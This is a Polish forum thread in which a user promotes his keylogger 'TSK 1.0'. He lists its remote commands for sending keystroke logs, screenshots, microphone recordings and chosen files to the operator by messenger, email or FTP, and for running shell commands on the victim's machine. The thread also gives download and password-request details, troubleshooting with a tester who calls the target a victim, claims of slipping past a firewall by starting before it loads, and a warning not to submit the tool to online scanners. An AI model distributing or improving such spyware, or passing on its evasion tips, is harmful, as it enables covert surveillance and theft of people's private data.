TSK 1.0

Status
Zamknięty.

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Jest to najprosciej mowiac keylogger .Spisz polecen:


`help - to co wlasnie widzisz
`log gg - wysyla logi na gg (numer klienta)
`log mail - wysyla logi na maila
`log ftp - wysyla logi na ftp
`rec - rozpoczyna sekwencje nagrywania z mikrofonu
`stop - konczy wyzsza sekwencje
`screen gg - wysyla screena na gg
`screen mail - wysyla screena na maila
`screen ftp - wysyla screena na ftp
`plik + sciezka - wysyla dany plik na maila
`cmd + polecenie - wykonuje polecenie cmd.exe
`end - wylacza serwer do ponownego reboota
`rec mail - wysyla nagrany dzwiek na maila

Sciagnac go mozecie z tad Tianhao Site w dziale projekty dostepny tam jest rowniez film jak skonfigurowac Film Konfiguracja jak i jak obslugiwac keyloggera Film Obsluga

Aby dostac haslo pisz poprzez Formularz
 

d3vil

Były Moderator
Dołączył
Lipiec 25, 2005
Posty
495
brawo
smile.gif
faktycznie konkurencja, ale cel jeden - zdetronizować PK hehe
good work
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Zarowno w helpie programu po komendzie `help jak i tutaj w spisie podanym pomylilem sie i podalem ze komenda `plik wysyla plik na ftp tak naprawde ten plik jest wysylany na maila z gory sorki za pomylke wersja nadpisana z wlasciwym helpem jest juz na serwerzze
 

Ziem

Użytkownik
Dołączył
Lipiec 24, 2005
Posty
72
Testowałem tego keyloggera, ale nie wiem dlaczego nie działały logi (ani mail, ani gg). Pisze wysyłanie i tyle czekam czekam i nic. Screen nie chodził ale to pewnie dlatego że stare gg.
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
<div class='quotetop'>CYTAT("Ziem")</div>
Testowałem tego keyloggera, ale nie wiem dlaczego nie działały logi (ani mail, ani gg). Pisze wysyłanie i tyle czekam czekam i nic. Screen nie chodził ale to pewnie dlatego że stare gg.[/b]

Hmm sciagales wersje poprawiona ? Nie mozliwe ze ci nic nie dzialalo bo tuz przed wypuszczeniem tsk byl testowany i wszystko dobrze dzialalo
 

Ziem

Użytkownik
Dołączył
Lipiec 24, 2005
Posty
72
Ściągałem dzisiaj z twojej stronki.
Właśnie testowałem to na Windowsie Millenium a ofiara miała XP może to od tego??
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
<div class='quotetop'>CYTAT("Ziem")</div>
Ściągałem dzisiaj z twojej stronki.
Właśnie testowałem to na Windowsie Millenium a ofiara miała XP może to od tego??[/b]

szczerze mowiac nie mam pojecia.. testowalem na xp u sibeie na localu i u kolegi tez xp mial ,sp2 i kerio... po resecie serwer ominol kerio i wysylal normalnie logi i screeny :|
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Lol to ze tobie akurat nie dziala to nie znaczy ze wogule nie dziala ehhh....

jak nie wiezysz ze dziala to masz przyklad na filmiku albo spytaj sie blackhata bo byl alfa testerem
 

Ziem

Użytkownik
Dołączył
Lipiec 24, 2005
Posty
72
<div class='quotetop'>CYTAT("tianhao")</div>
Lol to ze tobie akurat nie dziala to nie znaczy ze wogule nie dziala ehhh....

jak nie wiezysz ze dziala to masz przyklad na filmiku albo spytaj sie blackhata bo byl alfa testerem[/b]

Ty mnie chyba źle zrozumiałeś nie chodzi mi o to czy u wszystkich działa czy nie (wiadomo, że czasem są problemy).
Zapytam inaczej co może być tego przyczyną
<
??
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Hmm moze zle laduje sie przy starcie systemu czasem wystepowal z tym blad lecz zdarzylo mi sie to tylko raz sp2 nie stanowy przeszkod av tez nie fw tylko nie ktore moga to wylapac gdyz serwer uchamia sie zanim fw zaladuje sie i mimo wykrycia pozniej polaczenia nie zrywa go
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Pewnie juz tak bo premiera byla jakis czas temu zreszta sam sprawdz tylko bron boze na jakiejs stronie online z skanerami
 

marek=-

Użytkownik
Dołączył
Luty 7, 2006
Posty
12
mam pytanie czy TSK loguje klawisze na klaw. numerycznej?? jezeli tak to chyba mam cos z kompem :/
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Originally posted by marek=-
mam pytanie czy TSK loguje klawisze na klaw. numerycznej?? jezeli tak to chyba mam cos z kompem :/

Tak loguje klaiwsze z klawiatury numerycznej co do tego ze strona nie dziala to jest to spowodowane wyczerpaniem limitu transferu na ten miesiac od przyszlego bedzie ok znow jezeli chcessz jakiegos mojego progsa to pisz na maila [email protected] to ci go wysle
 
Status
Zamknięty.
Do góry Bottom